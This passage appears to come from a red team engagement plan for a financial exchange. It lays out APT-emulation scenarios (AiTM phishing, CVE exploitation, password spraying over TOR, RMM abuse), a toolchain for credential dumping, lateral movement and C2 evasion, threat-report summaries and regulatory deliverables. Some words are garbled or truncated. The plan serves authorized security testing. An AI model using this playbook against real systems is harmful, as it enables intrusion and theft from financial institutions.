&lt;h2 id=&quot;phase-5-attack-execution-methodology&quot;&gt;Phase 5 — Attack Execution Methodology&lt;&#x2F;h2&gt;
&lt;p&gt;Execution follows &lt;strong&gt;NIST SP 800-115 four phases&lt;&#x2F;strong&gt;: Planning → Discovery → Attack → Reporting.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;5-1-reconnaissance&quot;&gt;5.1 Reconnaissance&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;(CSF 2.0: Identify | NIST 800-53: RA-2, RA-3)&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Passive:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Shodan&lt;&#x2F;code&gt; &#x2F; &lt;code&gt;Censys&lt;&#x2F;code&gt; — Exposed services, banners, TLS certificates&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;crt.sh&lt;&#x2F;code&gt; — Certificate Transparency subdomain enumeration&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;theHarvester&lt;&#x2F;code&gt; &#x2F; &lt;code&gt;FOCA&lt;&#x2F;code&gt; — Employee names, email patterns, document metadata&lt;&#x2F;li&gt;
&lt;li&gt;LinkedIn org mapping — High-value personnel, technology stack inference from job postings&lt;&#x2F;li&gt;
&lt;li&gt;Dark web monitoring — Access broker listings, existing credential dumps for target domain&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Active (within authorized scope):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Nmap&lt;&#x2F;code&gt; &#x2F; &lt;code&gt;Masscan&lt;&#x2F;code&gt; — Service fingerprinting&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Nuclei&lt;&#x2F;code&gt; — Automated CVE detection; financial-specific templates (Citrix, Fortinet, Exchange, ConnectWise)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Aquatone&lt;&#x2F;code&gt; — Visual recon of web attack surface&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;5-2-initial-access-scenarios&quot;&gt;5.2 Initial Access Scenarios&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Scenario A — Spear Phishing (Lazarus &#x2F; APT34 &#x2F; APT35 &#x2F; MuddyWater emulation)&lt;&#x2F;strong&gt;
Craft themed lures: SEC&#x2F;DORA compliance notices, regulatory update PDFs, spoofed vendor invoices, fake job offers, financial recruiter outreach. Deliver via &lt;code&gt;Gophish&lt;&#x2F;code&gt; with AiTM proxy (&lt;code&gt;Evilginx2&lt;&#x2F;code&gt;). Payload: staged Sliver HTTPS beacon wrapped in &lt;code&gt;Donut&lt;&#x2F;code&gt;&#x2F;&lt;code&gt;Scarecrow&lt;&#x2F;code&gt; shellcode loader.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Scenario B — External Vulnerability Exploitation (RansomHub &#x2F; APT35 emulation)&lt;&#x2F;strong&gt;
Target Citrix NetScaler (CVE-2023-4966), Fortinet (CVE-2023-48788), ConnectWise (CVE-2024-1709), PaperCut (CVE-2023-27350). Deploy Sliver beacon on successful shell.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Scenario C — Supply Chain &#x2F; Third-Party (APT29 &#x2F; Lazarus &#x2F; MuddyWater emulation)&lt;&#x2F;strong&gt;
Simulate compromise of a trading ISV, clearing system vendor, managed service provider, or IT support firm (replicating MuddyWater&#x27;s &quot;Rashim&quot; IT provider pattern). Sliver beacon deployed via vendor access credential; pivot into exchange network.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Scenario D — Help Desk Social Engineering (Scattered Spider emulation)&lt;&#x2F;strong&gt;
Voice vishing targeting IT help desk for MFA device enrollment or password reset. Sliver HTTPS beacon deployed post-takeover.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Scenario E — Password Spray &#x2F; Cloud Identity (APT33 emulation)&lt;&#x2F;strong&gt;
Large-scale M365 &#x2F; Entra ID password spray through TOR exit nodes. On success, deploy Sliver beacon; enumerate cloud tenant via &lt;code&gt;AADInternals&lt;&#x2F;code&gt; and &lt;code&gt;ROADtools&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Scenario F — RMM Tool Abuse (MuddyWater emulation)&lt;&#x2F;strong&gt;
Deliver phishing email from spoofed or compromised organizational account (bypasses SPF&#x2F;DKIM). Lure targets CFO&#x2F;finance executive persona. Payload delivers Sliver beacon alongside silent installation of RMM agent (AteraAgent, NetBird, SimpleHelp). Validate whether EDR detects unauthorized RMM agent enrollment per NYDFS §500.14(b).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;5-3-post-exploitation-lateral-movement&quot;&gt;5.3 Post-Exploitation &amp;amp; Lateral Movement&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;em&gt;(CSF 2.0: Detect&#x2F;Respond | NIST 800-53: AC-2, AC-6, AU-12, IR-4)&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Technique&lt;&#x2F;th&gt;&lt;th&gt;Tool&lt;&#x2F;th&gt;&lt;th&gt;NIST 800-53 Control Tested&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;AD Enumeration&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;BloodHound CE&lt;&#x2F;code&gt; + &lt;code&gt;SharpHound&lt;&#x2F;code&gt; (via Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt;)&lt;&#x2F;td&gt;&lt;td&gt;AC-2, AC-6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Credential Dumping&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;sideload mimikatz.dll&lt;&#x2F;code&gt;; &lt;code&gt;Nanodump&lt;&#x2F;code&gt; BOF&lt;&#x2F;td&gt;&lt;td&gt;IA-5, SC-28&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Kerberoasting&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;Rubeus&lt;&#x2F;code&gt; via Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;td&gt;IA-5, AC-3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;LSASS Bypass&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;PPLdump&lt;&#x2F;code&gt; via Sliver &lt;code&gt;sideload&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;td&gt;SI-3, SC-39&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;psexec&lt;&#x2F;code&gt;, &lt;code&gt;wmiexec&lt;&#x2F;code&gt;, &lt;code&gt;ssh&lt;&#x2F;code&gt;; &lt;code&gt;NetExec&lt;&#x2F;code&gt; (SMB, WMI, MSSQL)&lt;&#x2F;td&gt;&lt;td&gt;SC-7, AC-17&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Cloud Enumeration&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;AADInternals&lt;&#x2F;code&gt;, &lt;code&gt;ROADtools&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;td&gt;AC-3, IA-8&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Internal Pivot&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;portfwd&lt;&#x2F;code&gt;; &lt;code&gt;socks5&lt;&#x2F;code&gt; proxy; &lt;code&gt;wg-portfwd&lt;&#x2F;code&gt; for RDP via WireGuard tunnel&lt;&#x2F;td&gt;&lt;td&gt;SC-7&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;SWIFT Targeting&lt;&#x2F;td&gt;&lt;td&gt;Custom scripts via Sliver tunnel&lt;&#x2F;td&gt;&lt;td&gt;SC-8, SI-4, AU-10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Payload Evasion&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;Donut&lt;&#x2F;code&gt;, &lt;code&gt;Scarecrow&lt;&#x2F;code&gt; wrapping Sliver shellcode&lt;&#x2F;td&gt;&lt;td&gt;SI-3, SC-39&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;.NET in-memory&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute-assembly &#x2F;path&#x2F;to&#x2F;Seatbelt.exe -group=all&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;td&gt;SI-3, AU-2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h3 id=&quot;5-4-crown-jewel-flags&quot;&gt;5.4 Crown Jewel Flags&lt;&#x2F;h3&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Objective&lt;&#x2F;th&gt;&lt;th&gt;CSF 2.0 Function&lt;&#x2F;th&gt;&lt;th&gt;Threat Scenario&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Domain Admin compromise&lt;&#x2F;td&gt;&lt;td&gt;Protect &#x2F; Detect&lt;&#x2F;td&gt;&lt;td&gt;Ransomware pre-positioning (RansomHub, APT35)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Trade OMS access&lt;&#x2F;td&gt;&lt;td&gt;Protect&lt;&#x2F;td&gt;&lt;td&gt;Market manipulation &#x2F; trade spoofing (APT34, APT29)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;SWIFT endpoint staging&lt;&#x2F;td&gt;&lt;td&gt;Protect&lt;&#x2F;td&gt;&lt;td&gt;Fraudulent transfer (Lazarus, APT38)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Clearing system credential access&lt;&#x2F;td&gt;&lt;td&gt;Protect&lt;&#x2F;td&gt;&lt;td&gt;Settlement disruption (Predatory Sparrow, APT33)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;PII &#x2F; trading data exfiltration&lt;&#x2F;td&gt;&lt;td&gt;Respond&lt;&#x2F;td&gt;&lt;td&gt;SEC 8-K materiality trigger; NYDFS 72-hr notification test&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Cloud tenant admin access&lt;&#x2F;td&gt;&lt;td&gt;Detect&lt;&#x2F;td&gt;&lt;td&gt;M365&#x2F;Entra ID full takeover (APT29, Scattered Spider)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Unauthorized RMM agent enrollment&lt;&#x2F;td&gt;&lt;td&gt;Detect&lt;&#x2F;td&gt;&lt;td&gt;MuddyWater RMM persistence; NYDFS §500.14(b) EDR gap&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Physical &#x2F; data center access&lt;&#x2F;td&gt;&lt;td&gt;Protect&lt;&#x2F;td&gt;&lt;td&gt;Insider threat &#x2F; supply chain (Predatory Sparrow)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-6-full-tools-configuration-reference&quot;&gt;Phase 6 — Full Tools &amp;amp; Configuration Reference&lt;&#x2F;h2&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Category&lt;&#x2F;th&gt;&lt;th&gt;Tool&lt;&#x2F;th&gt;&lt;th&gt;Configuration Notes&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;C2 Framework&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Sliver v1.5.42&lt;&#x2F;strong&gt; (BishopFox)&lt;&#x2F;td&gt;&lt;td&gt;Primary C2; HTTPS&#x2F;mTLS&#x2F;WireGuard&#x2F;DNS; per-binary asymmetric keys; multiplayer operator support; opeource; no licensing cost&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;C2 Redirectors&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Nginx &#x2F; Apache on separate VPS&lt;&#x2F;td&gt;&lt;td&gt;Proxy to Sliver team server; iptables whitelist only redirector IP on team server&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;CDN &#x2F; Fronting&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Cloudflare&lt;&#x2F;td&gt;&lt;td&gt;Front redirectors to avoid JARM fingerprinting and IP-based blocking&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Phishing&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Evilginx2 + Gophish&lt;&#x2F;td&gt;&lt;td&gt;AiTM MFA bypass; lure templates for APT35&#x2F;APT34&#x2F;Lazarus&#x2F;MuddyWater profiles&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Payload Wrapping&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Donut, Scarecrow&lt;&#x2F;td&gt;&lt;td&gt;AMSI&#x2F;ETW bypass on Sliver shellcode output&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;AD Reconnaissance&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;BloodHound CE + SharpHound&lt;&#x2F;td&gt;&lt;td&gt;Delivered via Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt;; Tier-0 path identification&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Credential Ops&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Mimikatz (via Sliver &lt;code&gt;sideload&lt;&#x2F;code&gt;), Rubeus, Nanodump BOF&lt;&#x2F;td&gt;&lt;td&gt;In-memory only; no disk drops&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Cloud Ops&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;AADInternals, ROADtools&lt;&#x2F;td&gt;&lt;td&gt;Entra ID &#x2F; M365 enumeration; OAuth token abuse (APT29 &#x2F; APT33 profiles)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Lateral Movement&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;NetExec, Sliver built-ins&lt;&#x2F;td&gt;&lt;td&gt;SMB&#x2F;WMI&#x2F;MSSQL; pass-the-hash&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Vuln Scanning&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Nuclei + financial CVE templates&lt;&#x2F;td&gt;&lt;td&gt;Citrix, Fortinet, Exchange, ConnectWise, PaperCut, VPN appliances&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;OSINT&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Maltego, SpiderFoot, theHarvester, FOCA&lt;&#x2F;td&gt;&lt;td&gt;Passive recon only until written authorization received&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;RMM Simulation&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;AteraAgent, NetBird (controlled install)&lt;&#x2F;td&gt;&lt;td&gt;MuddyWater scenario only; install in authorized scope; document for NYDFS §500.14(b) gap testing&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;Reporting&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;PlexTrac or Dradis&lt;&#x2F;td&gt;&lt;td&gt;CVSS v4.0; NIST 800-53 control mapping; MITRE ATT&amp;amp;CK Navigator JSON export&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;Tester Certifications:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;OSCP (Offensive Security Certified Professional)&lt;&#x2F;li&gt;
&lt;li&gt;CRTO (Certifie Red Team Operator)&lt;&#x2F;li&gt;
&lt;li&gt;GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)&lt;&#x2F;li&gt;
&lt;li&gt;CISSP or CISM (engagement leadership &#x2F; reporting sign-off)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-7-historical-reference-reports-2022-2025&quot;&gt;Phase 7 — Historical Reference Reports (2022–2025)&lt;&#x2F;h2&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Year&lt;&#x2F;th&gt;&lt;th&gt;Report&lt;&#x2F;th&gt;&lt;th&gt;Key Relevance&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2023&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;FS-ISAC &quot;Navigating Cyber 2024&quot;&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Found that 35% of all DDoS attacks in 2023 targeted financial services; flagged new extortion tactics tied to SEC&#x2F;DORA disclosure deadlines and quantum computing threats to cryptographic agility.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2023&lt;&#x2F;td&gt;&lt;td&gt;NISA Threat Landscape: Finance (Jan 2023–Jun 2024)**&lt;&#x2F;td&gt;&lt;td&gt;Documented North Korean APTs including Lazarus Group in cryptocurrency theft and ransomware; the FBI linked Lazarus to a $41 million theft from Stake.com in September 2023.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2023&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;ION Group &#x2F; LockBit Incident (Feb 2023)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;LockBit&#x27;s attack on ION disrupted a cleared derivatives trading platform, affecting multiple banks, brokerages, and hedge funds in the US and EU that could not process transactions. Highest-fidelity public template for tradininfrastructure disruption.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2023&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Clop &#x2F; MOVEit Supply Chain (Mar–Jul 2023)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;The Clop ransomware group&#x27;s exploitation of the MOVEit vulnerability impacted roughly 100 financial companies, establishing the benchmark supply chain scenario for vendor-pivot red team exercises.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;CISA Advisory AA24-057A — SVR Cloud Tactics&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Documents APT29&#x2F;Midnight Blizzard cloud-native TTPs including residential proxy use and exploitation of system accounts in identity infrastructure — directly infoenario C (APT29).&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;CISA &#x2F; FBI &#x2F; CNMF &#x2F; NCSC Advisory AA22-055A — MuddyWater&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Joint advisory formally attributing MuddyWater to MOIS; documents full TTP baseline including spear-phishing, RMM tool abuse, and open-source tool integration — foundational reference for Scenario F.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Flashpoint Financial Threat Actor Report&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Akira targeted 34 financial organizations; RansomHub claimed 38 financial victims; LockBit claimed access to the US Federal Reserve with alleged exfiltration 3 TB of data; Scattered Spider leveraged SIM swapping extensively.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;CloudSEK Charming Kitten (APT35) Leak Analysis&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Credible leak of APT35 operational materials documenting coordinated teams for penetration, malware development, and social engineering, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation targeting financial sectors in the Middle East, US, and Asia.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Check Point BugSleep Analysis (Jul 2024)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Full technical breakdown of MuddyWater&#x27;s BugSleep backdoor, including sleep API sandbox evasion, mutex creation, encrypted C2 configuration, and Egnyte&#x2F;file-sharing delivery chain — directly informs MuddyWater Scenario F emulation.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Zscaler WINELOADER Analysis (Nov 2024)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Documented WINELOADER&#x27;s time-gated C2 communications and memory forensics evasion — the precise behavioral signature this engagement&#x27;s Sliver long-dwell configuration should emulate in Scenario C (APT29).&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2024&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Deep Instinct DarkBeatC2 Analysis (Apr 2024)&lt;&#x2F;strong&gt; sclosed MuddyWater&#x27;s DarkBeatC2 framework, including the Registry AutodialDLL sideloading technique and PowerShell-based C2 management — informs Sliver-based DarkBeatC2 emulation.&lt;&#x2F;td&gt;&lt;td&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2025&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Bybit $1.5B Heist Post-Mortems (Feb 2025)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Lazarus deceived exchange executives into authorizing transfer of over 400,000 ETH via a counterfeit wallet management interface — definitive template for transaction authorization layer compromise.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2025&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Predatory Sparrow — Bank Sepah &#x2F; Nobitex (Jun 2025)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;tory Sparrow claimed to have destroyed Bank Sepah&#x27;s data causing widespread service outages, and the following day stole $90 million from the Nobitex crypto exchange before destroying the funds — establishes the benchmark for destructive state-level financial exchange targeting.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2025&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Trellix Iranian Cyber Capability 2026 Report&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;Documents APT35&#x27;s dual-track development of BellaCPP and updated PowerLess backdoor with AMSI&#x2F;ETW bypass, APT34&#x27;s dual-channel C2 concealment inside Authorization Bearetokens, and MuddyWater&#x27;s evolving malware suite (BugSleep, StealthCache, Phoenix, Fooder, MuddyViper, RustyWater) — directly informs Scenarios B, C, and F.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2025&lt;&#x2F;td&gt;&lt;td&gt;&lt;strong&gt;Symantec&#x2F;Carbon Black MuddyWater U.S. Bank Detection (Mar 2025)&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;First confirmed MuddyWater activity on a U.S. bank network; overlap with pre-conflict operational security posture suggesting deliberate preparation — highest-relevance historical data point for U.S. exchange MuddyWater scenario justification.&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;phase-8-closeporting-regulatory-deliverables&quot;&gt;Phase 8 — Closeporting &amp;amp; Regulatory Deliverables&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;8-1-purple-team-exercise&quot;&gt;8.1 Purple Team Exercise&lt;&#x2F;h3&gt;
&lt;p&gt;After covert red team phase concludes:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Replay each scenario with SOC observing live&lt;&#x2F;li&gt;
&lt;li&gt;Validate SIEM &#x2F; EDR detection coverage against MITRE ATT&amp;amp;CK Navigator heatmap&lt;&#x2F;li&gt;
&lt;li&gt;Identify detection gaps for Sliver-specific signatures (JARM, mTLS port 8888, WireGuard UDP 51820, characteristic certificate chains)&lt;&#x2F;li&gt;
&lt;li&gt;Specifically validate RMM agent detection (Atera, SimpleHelp, NetBird) per NYDFS §500.14(b) EDR&#x2F;SIEM compliance requirements&lt;&#x2F;li&gt;
&lt;li&gt;Document resuts for regulatory evidence package&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;8-2-findings-classification&quot;&gt;8.2 Findings Classification&lt;&#x2F;h3&gt;
&lt;p&gt;All findings scored using &lt;strong&gt;CVSS v4.0&lt;&#x2F;strong&gt; and mapped to &lt;strong&gt;NIST 800-53 Rev. 5&lt;&#x2F;strong&gt; control families. Classified as Critical &#x2F; High &#x2F; Medium &#x2F; Low. Critical findings are reviewed by legal counsel for SEC 8-K materiality assessment obligations per the four-business-day disclosure rule.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;8-3-required-deliverables&quot;&gt;8.3 Required Deliverables&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;For Board &#x2F; Executive Leadership&lt;&#x2F;strong&gt; (CSF 2.0 Govern; SEC Form 10-K Item 106):&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Executive Summary: business risk narrative, crown jewel findings, regulatory exposure by APT actor&lt;&#x2F;li&gt;
&lt;li&gt;NIST CSF 2.0 current vs. target profile heat map&lt;&#x2F;li&gt;
&lt;li&gt;Prioritized remediation roadmap&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;For Technical Teams&lt;&#x2F;strong&gt; (NIST 800-53 CA-8; NYDFS §500.5):&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Full attack path documentation with screenshots, Sliver session logs, and evidence chains per scenario&lt;&#x2F;li&gt;
&lt;li&gt;All TTPs mapped to MITRE ATT&amp;amp;CK Navigator layer (exportable JSON)&lt;&#x2F;li&gt;
&lt;li&gt;Sliver-specific detection signatures (JARM fingerprints, mTLS port anomalies, WireGuard UDP&#x2F;51820 baseline) for SOC integration&lt;&#x2F;li&gt;
&lt;li&gt;RMM tool abue detection signatures for MuddyWater-profile gaps&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;For Compliance &#x2F; Legal&lt;&#x2F;strong&gt; (NYDFS §500.17; SEC Rule 10; PCI DSS Req. 11.3):&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;NYDFS §500.17(b) compliance attestation documentation&lt;&#x2F;li&gt;
&lt;li&gt;Materiality assessment for any simulated finding against SEC 4-day disclosure standard&lt;&#x2F;li&gt;
&lt;li&gt;PCI DSS Req. 11.3 pen test completion report (signed by OSCP&#x2F;GXPN-certified tester)&lt;&#x2F;li&gt;
&lt;li&gt;CRI Cyber Profile 2.0 control objective coverage mapping&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;8-4-retention-requirements&quot;&gt;8.4 Retention Requirements&lt;&#x2F;h3&gt;
&lt;p&gt;All supporting records — including penetration testing rts, access control reviews, and cybersecurity program documentation — must be retained for five years under NYDFS Part 500. Evidence packages should be archived in a tamper-evident, access-controlled repository.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;blockquote&gt;
